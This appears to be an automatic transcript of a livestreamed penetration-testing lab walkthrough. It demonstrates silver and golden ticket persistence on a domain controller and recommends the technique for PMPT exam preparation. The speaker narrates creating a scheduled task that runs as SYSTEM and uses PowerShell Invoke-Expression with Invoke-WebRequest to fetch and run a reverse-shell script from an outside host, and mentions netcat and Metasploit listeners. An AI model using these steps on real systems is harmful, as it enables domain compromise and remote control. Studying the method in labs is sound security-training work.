we're going to do a period, we're going to C, or I wonder if we can do like a change directory. And let's see that users, administrator, desktop. There's probably a much easier way to do this. Period slash desktop. Invoke Powershell TCP.ps1, invoke Powershell, boom, boom. There's probably a much easier way to do this, you know what I'm saying? But I'm doing it this way, so do it the way that I know. This is probably a super sloppy way of doing it. So 5, okay. See if we get anything back. See if looks like he actually did try and download over there. Not getting anything over here still. So I'm sure that we could get it if we kept messing with it. It's starting to get to the point where, you know, something like mess with it on your own kind of thing. That's how I feel. Especially as I was getting the permission denied, stuff like that the first time. You know? Or if I need to get rid of this. Well, it's not like it's really going to matter. If I actually just run, let's actually, yeah, there we go. Let's actually just run this guy. Let's see if we can run him. Run with PowerShell. See if anything happens. See if I get a call back over here. If I don't get a callback over here, then I know that there's another problem. So I'm not getting a callback or anything. Let's go ahead and hop back over into that guy again. Exit off here. Let's try to do it again. Run with PowerShell. Okay, so we do get a callback from him. So we know that does work. Right? Because we do get callback from him. So why does the scheduled task work now, right? So we're doing PowerShell that we get. Just make a whole bunch of different scheduled tasks and just have them run back to back to back to back. And we shouldn't even have to do all that, like right there. We really shouldn't even have to do this whole last part, like right here. Shouldn't have to do all this. We shouldn't do a lot of this. We should just have to do an invoke expression, invoke web request. Should have to really do invoke expression, invoke web request. Maybe I have to use basic parsing. Maybe I have to do something like that. For HTTP 192.168.0.37, right? Slash invoke PowerShell TCP.ps1, right? And we'll name that 6, I guess, because that's all that we should have to do, like right there. This guy probably already died. So annoying. Oh, we got it. So if I do a who am I, we are running as NT Authority System. Boom, we got it. There we go. PowerShell running as we can see, it's running as computer on DC01. It's the computer name. So it did use that silver ticket to be able to do this, like right here. Awesome. I'm super stoked that we got it. That was awesome. So let's look at that one more time, okay? So what we did was, why didn't it work the first time then? We did scheduled tasks, right? Created on DC01, local. All right. It's going to run as NT Authority System. The task name is stcheck6. All right. And what we're going to do is we're going to run PowerShell.exe, invoke expression, invoke web request, use basic parsing. I think that was the problem the first time, is that we didn't do a use basic parsing right. After we use basic parsing, we get into the HTTP, boom, invoke PowerShell TCP.ps1, and then from there we did end up running that task, and we ran it to be able to become NT Authority System, and that would be a weekly thing. So if we had netcat, do I have netcat? That'd be sweet if I had netcat. Okay, I don't have netcat. Netcat would have been sweet if I had something like that. So if I had netcat on here, we could just leave him running, or use exploit multi-handler or anything like that nature, and we could have gotten it back like that. We can actually open up Kali Lake real quick and show it, but you know, we would have netcat use exploit multi-handler or something like that. Leave that running, and then all of a sudden we would get connection. Maybe have them run in the background, right? It's a background job or whatever else. For this scenario, we just used PowerCat just to show it like real quick. All right, and that did run, and that's super exciting. That did run, and that did work. Awesome. So sweet. That is a silver and golden ticket attack. Those are 2 attacks that should count as persistence within the PMPT. So if you're looking for something like that, there you go. Thanks for watching the video. Thanks for sticking around. I'm going to send these guys off to another Twitch streamer. Let's see what we got here. Let's see what we got. What is it called? InfoSec. Yep, streams.github.io. And I'm doing one online. So I'm not going to send them anywhere. All right. You guys have a good one, and I'll talk to you all later. All right. Bye.